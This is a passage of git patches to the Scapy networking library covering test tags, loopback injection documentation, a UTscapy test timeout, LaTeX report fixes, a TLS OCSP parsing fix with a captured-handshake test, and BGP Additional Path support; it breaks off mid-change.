+++ b/test/scapy/layers/dns_edns0.uts @@ -61,7 +61,7 @@ tlv = EDNS0TLV(optcode=2, optdata="") raw(tlv) == b'\x00\x02\x00\x00' = NSID - Live test -~ netaccess +~ netaccess needs_root def _test(): old_debug_dissector = conf.debug_dissector diff --git a/test/scapy/layers/l2.uts b/test/scapy/layers/l2.uts index 92df628b93f..2a3bedd9953 100644 --- a/test/scapy/layers/l2.uts +++ b/test/scapy/layers/l2.uts @@ -8,7 +8,7 @@ + Layer 2 Unit Tests = Arping -~ netaccess tcpdump +~ netaccess needs_root tcpdump * This test assumes the local network is a /24. This is bad. def _test(): ip_address = conf.route.route("0.0.0.0")[2] diff --git a/test/sendsniff.uts b/test/sendsniff.uts index 1e4ec53558c..9a692774378 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -1,6 +1,6 @@ % send, sniff, sr* tests for Scapy -~ netaccess +~ needs_root ############ ############ diff --git a/test/tuntap.uts b/test/tuntap.uts index 34fdba9ce36..d97fc65e448 100644 --- a/test/tuntap.uts +++ b/test/tuntap.uts @@ -26,7 +26,7 @@ assert isinstance(p.payload, IPv6) ####### + Test tun device -~ tun netaccess not_libpcap +~ tun needs_root not_libpcap = Create a tun interface @@ -71,7 +71,7 @@ tun0.close() ####### + Test strip_packet_info=False on Linux -~ tun linux netaccess not_libpcap +~ tun linux needs_root not_libpcap = Create a tun interface @@ -122,7 +122,7 @@ tun0.close() + Test strip_packet_info=True and IPv6 -~ tun netaccess ipv6 not_libpcap +~ tun needs_root ipv6 not_libpcap = Create a tun interface with IPv4 + IPv6 @@ -188,7 +188,7 @@ tun0.close() + Test tap interfaces -~ tap netaccess not_libpcap +~ tap needs_root not_libpcap = Create a tap interface with IPv4 From 2d11ff1e7e9a557871656486d0ba80920b703ab1 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 12 Sep 2021 00:19:01 +0200 Subject: [PATCH 0649/1632] Loopback: fix & documentation (#3363) * Use the correct type value to inject IPv6 packets on the loopback interface * Documenting loopback packets injection * Document AF_INET6 specificity --- doc/scapy/troubleshooting.rst | 38 +++++++++++++++++++++++++++++------ scapy/layers/inet6.py | 8 +++++++- 2 files changed, 39 insertions(+), 7 deletions(-) diff --git a/doc/scapy/troubleshooting.rst b/doc/scapy/troubleshooting.rst index 82403c09efe..253f6f0e14e 100644 --- a/doc/scapy/troubleshooting.rst +++ b/doc/scapy/troubleshooting.rst @@ -25,19 +25,45 @@ My TCP connections are reset by Scapy or by my kernel. ------------------------------------------------------ The kernel is not aware of what Scapy is doing behind his back. If Scapy sends a SYN, the target replies with a SYN-ACK and your kernel sees it, it will reply with a RST. To prevent this, use local firewall rules (e.g. NetFilter for Linux). Scapy does not mind about local firewalls. -I can't ping 127.0.0.1. Scapy does not work with 127.0.0.1 or on the loopback interface ---------------------------------------------------------------------------------------- +I can't ping 127.0.0.1 (or ::1). Scapy does not work with 127.0.0.1 (or ::1) on the loopback interface. +------------------------------------------------------------------------------------------------------- -The loopback interface is a very special interface. Packets going through it are not really assembled and disassembled. The kernel routes the packet to its destination while it is still stored an internal structure. What you see with tcpdump -i lo is only a fake to make you think everything is normal. The kernel is not aware of what Scapy is doing behind his back, so what you see on the loopback interface is also a fake. Except this one did not come from a local structure. Thus the kernel will never receive it. +The loopback interface is a very special interface. Packets going through it are not really assembled and disassembled. The kernel routes the packet to its destination while it is still stored an internal structure. What you see with ```tcpdump -i lo``` is only a fake to make you think everything is normal. The kernel is not aware of what Scapy is doing behind his back, so what you see on the loopback interface is also a fake. Except this one did not come from a local structure. Thus the kernel will never receive it. -In order to speak to local applications, you need to build your packets one layer upper, using a PF_INET/SOCK_RAW socket instead of a PF_PACKET/SOCK_RAW (or its equivalent on other systems than Linux):: +On Linux, in order to speak to local IPv4 applications, you need to build your packets one layer upper, using a PF_INET/SOCK_RAW socket instead of a PF_PACKET/SOCK_RAW (or its equivalent on other systems than Linux):: >>> conf.L3socket - >>> conf.L3socket=L3RawSocket - >>> sr1(IP(dst="127.0.0.1")/ICMP()) + >>> conf.L3socket = L3RawSocket + >>> sr1(IP(dst) / ICMP()) > +With IPv6, you can simply do:: + + # Layer 3 + >>> sr1(IPv6() / ICMPv6EchoRequest()) + > + + # Layer 2 + >>> conf.iface = "lo" + >>> srp1(Ether() / IPv6() / ICMPv6EchoRequest()) + >> + +On Windows, BSD, and macOS, you must deactivate the local firewall and set ````conf.iface``` to the loopback interface prior to using the following commands:: + + # Layer 3 + >>> sr1(IP() / ICMP()) + > + >>> sr1(IPv6() / ICMPv6EchoRequest()) + > + + # Layer 2 + >>> srp1(Loopback() / IP() / ICMP()) + >> + >>> srp1(Loopback() / IPv6() / ICMPv6EchoRequest()) + >> + + BPF filters do not work. I'm on a ppp link ------------------------------------------ diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 1b702973c9c..78e6739b464 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -36,6 +36,7 @@ from scapy.as_resolvers import AS_resolver_riswhois from scapy.base_classes import Gen from scapy.compat import chb, orb, raw, plain_str, bytes_encode +from scapy.consts import WINDOWS from scapy.config import conf from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ MTU @@ -4071,7 +4072,12 @@ def _load_dict(d): bind_layers(CookedLinux, IPv6, proto=0x86dd) bind_layers(GRE, IPv6, proto=0x86dd) bind_layers(SNAP, IPv6, code=0x86dd) -bind_layers(Loopback, IPv6, type=socket.AF_INET6) +# AF_INET6 values are platform-dependent. For a detailed explaination, read +# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501 +if WINDOWS: + bind_layers(Loopback, IPv6, type=0x18) +else: + bind_layers(Loopback, IPv6, type=socket.AF_INET6) bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) From 23ff728153479378f388aa244525e45ccd679b8e Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 4 Sep 2021 13:49:19 +0200 Subject: [PATCH 0650/1632] name is a reserved Field name --- doc/scapy/build_dissect.rst | 1 + 1 file changed, 1 insertion(+) diff --git a/doc/scapy/build_dissect.rst b/doc/scapy/build_dissect.rst index e5c11a8f302..b099798137a 100644 --- a/doc/scapy/build_dissect.rst +++ b/doc/scapy/build_dissect.rst @@ -1136,6 +1136,7 @@ Field naming convention ----------------------- The goal is to keep the writing of packets fluent and intuitive. The basic instructions are the following : +* Do not use any value from the ``Packet.__slots__``` list as a field name (such as name, time or original), as they are reserved for Scapy internals * Use inverted camel case and common abbreviations (e.g. len, src, dst, dstPort, srcIp). * Wherever it is either possible or relevant, prefer using the names from the specifications. This aims to help newcomers to easily forge packets. From 263e7ce434524ae04bd822101170ca7f13ba3367 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 13 Sep 2021 09:45:21 +0200 Subject: [PATCH 0651/1632] Add timeout to UTscapy --- scapy/tools/UTscapy.py | 21 +++++++++++++++++++-- 1 file changed, 19 insertions(+), 2 deletions(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 17c1cdc218d..993df76dbbc 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -21,6 +21,7 @@ import os import os.path import sys +import threading import time import traceback import warnings @@ -28,7 +29,7 @@ from scapy.consts import WINDOWS import scapy.modules.six as six -from scapy.modules.six.moves import range +from scapy.modules.six.moves import range, queue from scapy.config import conf from scapy.compat import base64_bytes, bytes_hex, plain_str from scapy.themes import DefaultTheme, BlackAndWhite @@ -517,11 +518,27 @@ def remove_empty_testsets(test_campaign): # RUN TEST # +def _run_test_timeout(test, get_interactive_session, verb=3, my_globals=None): + """Run a test with timeout""" + q = queue.Queue() + + def _runner(): + output, res = get_interactive_session(test, verb=verb, my_globals=my_globals) + q.put((output, res)) + th = threading.Thread(target=_runner) + th.daemon = True + th.start() + th.join(60 * 3) # 3 min timeout + if th.is_alive(): + return "Test timed out", False + return q.get() + + def run_test(test, get_interactive_session, theme, verb=3, my_globals=None): """An internal UTScapy function to run a single test""" start_time = time.time() - test.output, res = get_interactive_session(test.test.strip(), verb=verb, my_globals=my_globals) + test.output, res = _run_test_timeout(test.test.strip(), get_interactive_session, verb=verb, my_globals=my_globals) test.result = "failed" try: if res is None or res: From ff1ab97f6276510449f1442d2708de0c73ac8b59 Mon Sep 17 00:00:00 2001 From: Max Suraev Date: Tue, 14 Sep 2021 15:56:59 +0200 Subject: [PATCH 0652/1632] Unbreak LaTeX output (#3360) * Unbreak LaTeX output Signed-off-by: Max * Fix LaTeX theme typo Signed-off-by: Max --- scapy/themes.py | 2 +- scapy/tools/UTscapy.py | 61 +++++++++++++++++++++++++++++------------- 2 files changed, 44 insertions(+), 19 deletions(-) diff --git a/scapy/themes.py b/scapy/themes.py index 4922bf8c4cb..f9abf1091e0 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -301,7 +301,7 @@ class LatexTheme2(FormatTheme): style_packetlist_proto = r"@`@textcolor@[@blue@]@@[@%s@]@" style_packetlist_value = r"@`@textcolor@[@purple@]@@[@%s@]@" style_fail = r"@`@textcolor@[@red@]@@[@@`@bfseries@[@@]@%s@]@" - style_success = r"@`@textcolor@[@blue@]@@[@@`@bfserices@[@@]@%s@]@" + style_success = r"@`@textcolor@[@blue@]@@[@@`@bfseries@[@@]@%s@]@" style_even = r"@`@textcolor@[@gray@]@@[@@`@bfseries@[@@]@%s@]@" # style_odd = r"@`@textcolor@[@black@]@@[@@`@bfseries@[@@]@%s@]@" style_left = r"@`@textcolor@[@blue@]@@[@%s@]@" diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 993df76dbbc..decb6326c96 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -33,6 +33,7 @@ from scapy.config import conf from scapy.compat import base64_bytes, bytes_hex, plain_str from scapy.themes import DefaultTheme, BlackAndWhite +from scapy.utils import tex_escape # Check UTF-8 support # @@ -663,6 +664,14 @@ def html_info_line(test_campaign): return """Run %s from [%s] by UTscapy
    """ % (time.ctime(), filename) # noqa: E501 +def latex_info_line(test_campaign): + filename = test_campaign.filename + if filename is None: + return """by UTscapy""", """%s""" % time.ctime() + else: + return """from %s by UTscapy""" % tex_escape(filename), """%s""" % time.ctime() + + # CAMPAIGN TO something # def campaign_to_TEXT(test_campaign, theme): @@ -792,19 +801,9 @@ def pack_html_campaigns(runned_campaigns, data, local=False, title=None): def campaign_to_LATEX(test_campaign): - output = r"""\documentclass{report} -\usepackage{alltt} -\usepackage{xcolor} -\usepackage{a4wide} -\usepackage{hyperref} - -\title{%(title)s} -\date{%%s} - -\begin{document} -\maketitle -\tableofcontents - + output = r""" +\chapter{%(title)s} +Run %%s on \date{%%s} \begin{description} \item[Passed:] %(passed)i \item[Failed:] %(failed)i @@ -813,15 +812,16 @@ def campaign_to_LATEX(test_campaign): %(headcomments)s """ % test_campaign - output %= info_line(test_campaign) + output %= latex_info_line(test_campaign) for testset in test_campaign: - output += "\\chapter{%(name)s}\n\n%(comments)s\n\n" % testset + output += "\\section{%(name)s}\n\n%(comments)s\n\n" % testset for t in testset: + t.comments = tex_escape(t.comments) if t.expand: - output += r"""\section{%(name)s} + output += r"""\subsection{%(name)s} -[%(num)03i] [%(result)s] +Test result: \textbf{%(result)s}\newline %(comments)s \begin{alltt} @@ -830,7 +830,30 @@ def campaign_to_LATEX(test_campaign): """ % t - output += "\\end{document}\n" + return output + + +def pack_latex_campaigns(runned_campaigns, data, local=False, title=None): + output = r""" +\documentclass{report} +\usepackage{alltt} +\usepackage{xcolor} +\usepackage{a4wide} +\usepackage{hyperref} + +\title{%(title)s} + +\begin{document} +\maketitle +\tableofcontents + +%(data)s +\end{document}\n +""" + + out_dict = {'data': data, 'title': title if title else "UTScapy tests"} + + output %= out_dict return output @@ -1197,6 +1220,8 @@ def main(): # Concenate outputs if FORMAT == Format.HTML: glob_output = pack_html_campaigns(runned_campaigns, glob_output, LOCAL, glob_title) + if FORMAT == Format.LATEX: + glob_output = pack_latex_campaigns(runned_campaigns, glob_output, LOCAL, glob_title) # Write the final output # Note: on Python 2, we force-encode to ignore ascii errors From 081d6dde476cb8d1a1872cb8e884f4c9cdae7ba1 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 13 Sep 2021 14:52:54 +0200 Subject: [PATCH 0653/1632] Fix OSCP payload length --- scapy/layers/tls/handshake.py | 6 ++++-- test/tls.uts | 7 +++++++ 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index ca97b12aff6..f17ac578af2 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -24,6 +24,7 @@ FieldLenField, IntField, PacketField, + PacketLenField, PacketListField, ShortEnumField, ShortField, @@ -1503,7 +1504,7 @@ def getfield(self, pkt, s): _cert_status_cls = {1: OCSP_Response} -class _StatusField(PacketField): +class _StatusField(PacketLenField): def m2i(self, pkt, m): idtype = pkt.status_type cls = self.cls @@ -1519,7 +1520,8 @@ class TLSCertificateStatus(_TLSHandshake): ByteEnumField("status_type", 1, _cert_status_type), ThreeBytesLenField("responselen", None, length_of="response"), - _StatusField("response", None, Raw)] + _StatusField("response", None, Raw, + length_from=lambda pkt: pkt.responselen)] ############################################################################### diff --git a/test/tls.uts b/test/tls.uts index d14371d5e55..d172783799d 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1551,6 +1551,13 @@ tls_packet = TLS(msg=[TLSClientHello(ext=[TLS_Ext_KeyShare_CH(client_shares=[Key tls_packet.raw_stateful() assert tls_packet.tls_session.tls13_client_privshares['ffdhe4096'].key_size == 4096 += OCSP: payload after OCSP - GH3291 + +data = b'1603031616020000660303602161b58e22f4966f18f9aa6afd5759f343935ed437cf09c554dd27691a1eb420a13c0000eaad0a6cd4f11bfc59788daec98422be4f3810c19669207e509aaa11c03000001e000500000023000000100005000302683200170000ff01000100000000000b000d5d000d5a0007f6308207f2308205daa00302010202136b000006c55514d0a6c4891be20000000006c5300d06092a864886f70d01010b0500304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c53204341203031301e170d3230303930393231343530355a170d3231303930393231343530355a30223120301e060355040313177074692e73746f72652e6d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a028201010094876b9572b7c3d7fbb2d569ffff6b8f716245a2d9b413c9e8238ee88d98b1002cec8c2198b52f3b7f0a679ceb1aeb2c1467d2eda3c71b4bb0756ba42354a956b8d40bd422921793b3dec0aab3f5e0b023bcb7dfdf48bd4b064c1a62255e9b58c16ad482087fd1505b01aad9474f06925f3821fbe92f680e87db3f0aa150e2066848f88ebe08d8280185bbba697b39d12e03eae6d4e481319432f2752793fcd125f2714cd92b37e3d9b8fcec7fd7b3c121fdedc42b50ff65f73352cbc1202ac59c846df2a9168c00fc4754f5e19c3b0503dbe4f58b0f8b3e0fa411d4dcb8e1acdef9a2ca7db52e282a14119e1ef3a867a3b7d8fdaccc27d3d2033bb5082a1b510203010001a38203f2308203ee30820105060a2b06010401d6790204020481f60481f300f10076007d3ef2f88fff88556824c2c0ca9e5289792bc50e78097f2e6a9768997e22f0d70000017474dd866500000403004730450221008886de3960d7fe8cbaa9bcf91f961d920af99ec72adaf07fb6f6e2759d6d045b02201f90de8ad6dc333cbf920fe6cd66b41d97a01397831b2ea39f618c1505ecc7e70077004494652eb0eeceafc44007d8a8fe28c0dae682bed8cb31b53fd33396b5b681a80000017474dd86d200000403004830460221008f66e7ce568540722b5a09d96bc08d78a1cc98dda6c7c2cda1daaa7ea49d75f302210099ccca061b9b31f938988f2e4182fcb39035f6e90d5dee8c928582bd4e5fb693302706092b060104018237150a041a3018300a06082b06010505070301300a06082b06010505070302303e06092b06010401823715070431302f06272b060104018237150887da867583eed90182c9851b81b59e6185f4eb60815d85868e4187c2985002016402012530818706082b06010505070101047b3079305306082b060105050730028647687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f4d6963726f736f6674253230525341253230544c53253230434125323030312e637274302206082b060105050730018616687474703a2f2f6f6373702e6d736f6373702e636f6d301d0603551d0e041604142746d09d123c3c91382ef590e0aab2a901f0d0c3300b0603551d0f0404030204b030780603551d110471306f821b7074692d696e742e73746f72652e6d6963726f736f66742e636f6d82177074692e73746f72652e6d6963726f736f66742e636f6d821a7074692d696e742e747261666669636d616e616765722e6e6574821b7074692d70726f642e747261666669636d616e616765722e6e65743081b00603551d1f0481a83081a53081a2a0819fa0819c864d687474703a2f2f6d7363726c2e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f63726c2f4d6963726f736f6674253230525341253230544c53253230434125323030312e63726c864b687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f63726c2f4d6963726f736f6674253230525341253230544c53253230434125323030312e63726c30570603551d200450304e304206092b0601040182372a013035303306082b060105050702011627687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f6370733008060667810c010201301f0603551d23041830168014b5760c3011cec792424d4cc75c2cc8a90ce80b64301d0603551d250416301406082b0601050507030106082b06010505070302300d06092a864886f70d01010b0500038202010086dd00ab90b01c8f5c87d59c2cc45e2cb81998699e5e97aeceea13670bbf2b76e9add7cd11bc4ef347dbab7ea7c28300223bd43e5d2904db1516c55572181534f4efc11eccf4d10a9c08ddfbff53cad870856e0e3377b7639cfc3de5d3c7ca8294cc6e7ac0cac0e1a3cd4b0b81cdcb2fa1dbf6ebc2659d6f1947e8047be27c02fba8b6a991837781cea269246353e5441aa33c8494d4591ee482f448bef23460578f96c5c1e92f5a7cd7c81815b40a7cc00aeee6976a708c1d236c7fe64a4a45f7fd83707c0e621ff7e78fe089dd3ff539148a0acba6a99a8ca630ef2e2c83529596bbb3fb1c9ea7f371158d70b36120217154003e791db16390877c83dd27543c15e73c1af5f22b4c7c73347a9b97de633abdd9413363877a8a428f18cd624e310e2ea17aa4740a167aabecfb5f5c244ef8ada6638f90592df625885b9a57ec478acca5ec2c35e6c66b597be4570057d6769f3e5c2487ea70f84ecabc0f4064bb0e7be746d652f3861b931eb0e75846253e7eeae987cf7d4193bd1dc85044ee798d821536944c7ade7e269b13e4ece47093c641e7fc8d31dc0e3d211d94e8b450cfed2733ad78fac2eae225acd505117c39243a8e24feebd47ff875643d1ef777dd2a1a18f370dd83fdf85ca2eadf3c46711aedc68fc13b1db8bf71e015c77f69882613ea096c216e759553ea475a48db8ac4e92b8b184b7dbc9d458758e85200055e3082055a30820442a00302010202100f14965f202069994fd5c7ac788941e2300d06092a864886f70d01010b0500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3230303732313233303030305a170d3234313030383037303030305a304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c5320434120303130820222300d06092a864886f70d01010105000382020f003082020a0282020100aa6277cf9a63b20684f39036f499f31451abea950a3b4606fd11411ffe5b0658c9386e08fc4f4448cd3aa4f7bd1ea2e295b8be5120c5bfb270635d780c43c029cd64490996daafcefd055f2b2a91e8016e2e189b2c9cd0017f69f5ee3f53885cba056cbe2215671482f22cd2be5b6337ccaf6085e8966b6b8008a86ebe009c6b9570fce41812b11d1bb2c11331673334e625c9625b58827576f2fef23f3b16dfaa4283e3326d9b8e4326f0bd0e1fa1a73aaf2cc88ae6ea3ff9a5d2258f92aa1a08129cfeac4ac7c3eb8094ab8716d12349e7a4bbc791dfe679343f414aa73a26d2ea6f46e33873e6e5d491ae0b789e78a5ef96e373d8f79565e905bf4f5cff52a7f9cf08afa74d0999c071a3527aa53bd79b015403e3b662b05a279c30268eb64d56a117177a7b95a107ac5331b6d62e0fcd4174ecf101b2fd45bffc31e146423136431eb9aa055f847f91b18bae0fd754c3fdf064086ad39c8eea7934ec033d73e01b36d46811c75970b0877cc0dc6e45ca36ce43267702a9700de8b857544442c3fbac1b632608c2d2231f7f930b7c6f08549a2b4e5dce9fa53ed2985bd102dbf183ce3052483863f1b1fbed23d33e92b5278dd04273d79d236871ba595e0752a6964dbf7c4e6f742205c0538016d8604e97314f894e4863d8edf9e5c2d90eb20bf6694cbd4b01c9cbdd06bf3a02eb1cdd308b0d4a1460f9d5644f4344a1ed0203010001a382012530820121301d0603551d0e04160414b5760c3011cec792424d4cc75c2cc8a90ce80b64301f0603551d23041830168014e59d5930824758ccacfa085436867b3ab5044df0300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d303a0603551d1f04333031302fa02da02b8629687474703a2f2f63726c332e64696769636572742e636f6d2f4f6d6e69726f6f74323032352e63726c302a0603551d20042330213008060667810c0102013008060667810c010202300b06092b0601040182372a01300d06092a864886f70d01010b050003820101009f2bbe92675bda7b8aade8ff9d4d050eedb60d1541d1e615dc0360f9f422569c48f99daeda2b3ca8c0abd0ba95b8c8c1fd7c6371b6c87a889b3046a38e7d9602e3f82204efe036c06fc2bf2e0d6eedd676280d81873e9be7a7108cda661f4051eae7bebf4e6798bb5459636f42e30f31601964000f260c97d184c0a67a193b70de4526dc96463d9c663fe13a8238e53603042857a4e94b64a218886d60898d7abe10918bace63f3130bfeb64d79e8de9c192566e388d343faecd6c6b4252623cd46989e0a057590b839fc6722442f5080384ce1663f334f105763719b206de133e137061d304f2b8476f05e38a88302b47455e7954c5f9ddebfa3f785175d25b160006d6010006d2308206ce0a0100a08206c7308206c306092b0601050507300101048206b4308206b03081a5a21604149a0190a5b9942f43bc62113fcd3d404bead25250180f32303231303230383036303930325a307a3078304c300906052b0e03021a05000414521ee36c478119a9cb03fab74e57e1197af1818b0414b5760c3011cec792424d4cc75c2cc8a90ce80b6402136b000006c55514d0a6c4891be20000000006c58000180f32303231303230383036303930325aa011180f32303231303231323036303930325aa1023000300d06092a864886f70d01010b05000382010100784c3cee7765bf5cb164c0cf465462c37e97d11041443dcd9052e413747a71f8c37a051a29cdba11ea15cac3c252eeab533c7e9141431649a3a57a7dacc1fa697fdd360c139a35af181b7154574e7b87ade8da951d1894362082f80eb56d3775e729e930a097e72a7339e6e63719acc8166fd9c77c068cc75240a3b2149da8bcc24187addcfcc7330ad057b1d7a215380ea8e060b2a85330bc262c58e119672d846b87be7edf535d68a4bc2a643516df1c134401d96f0944d4d7ebe7a769ecdcfa90418486c9d62a9a4c46e232fa94221392f59a9c8df520b19e1214ed4ac70f54367b640924c48d2d3596056ff7424fc1734b98edc02dc67d8d72f6d10f44e8a08204f0308204ec308204e8308202d0a00302010202136b00086694d48d4b29943630f5000000086694300d06092a864886f70d01010b0500304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c53204341203031301e170d3231303230323139353831335a170d3232303230323139353831335a30353133303106035504030c2a4d6963726f736f66745f5253415f544c535f49737375696e675f43415f30315f4b657942696e64696e6730820122300d06092a864886f70d01010105000382010f003082010a0282010100b65a936febea1694e5de2b8dfc1997d265f3582b94f9be1fb56bb96e2191c5df170bb52d276c30c8fdc876f1e5b3d9b900571e17fd505534f56db0ab7953261a34911e9fb0340aac76c1baede9a580ee86eba49f0e3d7cddcc60d973c69afc157aaa5d2d6ede3cd7d9a265098ee932fde13049e0f1490b2bb88bd56b6e26033ad99f49f6b7366eb275e6550c6b74f1823ac6dcf86a843825ade03f670a7ce895c840a7cfca247bc94d608ee30feefa8346470bc69f0f2e847b5896b377d70fa20e99d3af06b2d8c286b512fad8070cdc33f3302f48ad02014a21de13d1a04fbdf6fca54cc7364e303a1b458d2093fb8e98f686c2d8da374e757f8ac25b2210e70203010001a381d63081d3301d0603551d0e041604149a0190a5b9942f43bc62113fcd3d404bead25250300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070309300f06092b060105050730010504020500301f0603551d23041830168014b5760c3011cec792424d4cc75c2cc8a90ce80b64303e06092b06010401823715070431302f06272b060104018237150887da867583eed90182c9851b81b59e6185f4eb60815d81cc9b4781c8e916020164020107301b06092b060104018237150a040e300c300a06082b06010505070309300d06092a864886f70d01010b0500038202010012d83b821ff2afc4d67c63cee2d9a1045c1a1f0628274e1da3ef03fcdc720d420423478090afe6cbbaf4c753fdcad04aef5ca919c96ab9b540a64cc23d24181e7016391e780ae56a0897a372ea9a93a959c0d713ae0cbd5e6ca420724a110ac0901d671ea8c57ba31db062a7df4bbc8cb78d820262f9ba12e4313edb85155f69c47a05fa6171958e6577b61910357a5940a3c3f186eb07a37968c7f17b5614603aae4e71cb2d5f122bbea187888452239cb9c0d338d913604034e4eb3be2639a15836d08b4b4f38287414e5cd144a23aa95edb59236205397263ead5b0ef1a2239f54149f9b5992a2964a28373652a1bb31a772a04c5d4eef2fd0e5853094590ccc5b1bcb9fc1910d31652cc8f2e72c685665834f3826613dd456655ae9c9f21283a1684123fa144bc3276f50ead086fd9c149b670b27804057472602a984a3de016f65bf0980baa8a0cbadd53b061800347fec63d80b0b68d164e295e682a890ae433c439ae04a31dd8b9260c81692a110e8583038e767ceab2b87db2067eeb1973aa5bbcd5f3b4fca071ca60361d9815e87c76c44e9791c7aa25defaaaa28d72c709ad434b44974ed50546b685e215c7a70065503f0014d5f9f1fdf851930af51e7c425d0ea0d966377f44d60bf6345a05d750d2de25ebb1957bdac56b1d9a3a4e556bf398e063062ea7e1400a279abb085c1fadb9e517231b5fdcb0d868c10c00016903001861040089499a5bf709647d1cd5e41d381c15ab96100c86f0d66d0ba53a224b2adb7897f63de0368a080e17e80da5f70505d58c5317cb047dfeeecc1c7e160fdbf4747c78fb2641b233ad509c12de3a83c3d9cab174c8ca3a748d43766a11eeaa3e8c080401006f041a8741e47e744c7b6b83abf44bc722ae7f1ca19e12989106c2a78a37c8713cac664d1d1dbff6a566b05f478f15123fb155850cafeb36120e9fb24ae4fc5f4c6e4614ebcaf1dab4a79405325d4774cef1c85facffdf57c182c7e22d29facb2ee7460b716aaa6b5e3235036d21a6212414f2d75fc85caa91317fcd0318c651f8459f32bfbda3f3b2e04c1f0c2f8982ea16d2df599133881106b27d53276703bc43230f0fdcadb8b1fe13101d1055a14d6cc6af8fa48d6dd23a0a36fb5d6ebb8f5021e3e20900b5de2442da9853d2446d75b1c2198d24cdc2a5a3d07a9aab451e196c6c49fce20bdb71a7190de2964afd934a7f14afb7872a49ab6a7a5cf2d30e000000' + +pkt = TLS(hex_bytes(data)) +assert [type(x) for x in pkt.msg] == [TLSServerHello, TLSCertificate, TLSCertificateStatus, TLSServerKeyExchange, TLSServerHelloDone] + ############################################################################### ############################ Automaton behaviour ############################## ############################################################################### From a7c03cbe9d594a28822bd5908cb1d56a37605838 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 29 Aug 2021 17:36:07 +0200 Subject: [PATCH 0654/1632] BGP: support additional path & fix dissection bug --- scapy/contrib/bgp.py | 140 ++++++++++++++++++++++++++++++++----------- scapy/fields.py | 4 +- scapy/packet.py | 19 +++--- test/contrib/bgp.uts | 13 ++++ 4 files changed, 132 insertions(+), 44 deletions(-) diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index 371ed1298eb..900113d553f 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -122,7 +122,7 @@ def i2repr(self, pkt, i): return self.i2h(pkt, i) def i2len(self, pkt, i): - mask, ip = i + mask, _ = i return self.mask2iplen(mask) + 1 def i2m(self, pkt, i): @@ -198,56 +198,122 @@ def has_extended_length(flags): return flags & _BGP_PA_EXTENDED_LENGTH == _BGP_PA_EXTENDED_LENGTH +def detect_add_path_prefix46(s, max_bit_length): + """ + Detect IPv4/IPv6 prefixes conform to BGP Additional Path but NOT conform + to standard BGP.. + + This is an adapted version of wireshark's detect_add_path_prefix46 + https://github.com/wireshark/wireshark/blob/ed9e958a2ed506220fdab320738f1f96a3c2ffbb/epan/dissectors/packet-bgp.c#L2905 + Kudos to them ! + """ + # Must be compatible with BGP Additional Path + i = 0 + while i + 4 < len(s): + i += 4 + prefix_len = orb(s[i]) + if prefix_len > max_bit_length: + return False + addr_len = (prefix_len + 7) // 8 + i += 1 + addr_len + if i > len(s): + return False + if prefix_len % 8: + if orb(s[i - 1]) & (0xFF >> (prefix_len % 8)): + return False + # Must NOT be compatible with standard BGP + i = 0 + while i + 4 < len(s): + prefix_len = orb(s[i]) + if prefix_len == 0 and len(s) > 1: + return True + if prefix_len > max_bit_length: + return True + addr_len = (prefix_len + 7) // 8 + i += 1 + addr_len + if i > len(s): + return True + if prefix_len % 8: + if orb(s[i - 1]) & (0xFF >> (prefix_len % 8)): + return True + return False + + class BGPNLRI_IPv4(Packet): """ Packet handling IPv4 NLRI fields. """ - name = "IPv4 NLRI" fields_desc = [BGPFieldIPv4("prefix", "0.0.0.0/0")] + def default_payload_class(self, payload): + return conf.padding_layer + class BGPNLRI_IPv6(Packet): """ Packet handling IPv6 NLRI fields. """ - name = "IPv6 NLRI" fields_desc = [BGPFieldIPv6("prefix", "::/0")] + def default_payload_class(self, payload): + return conf.padding_layer + + +class BGPNLRI_IPv4_AP(BGPNLRI_IPv4): + """ + Packet handling IPv4 NLRI fields WITH BGP ADDITIONAL PATH + """ + + name = "IPv4 NLRI 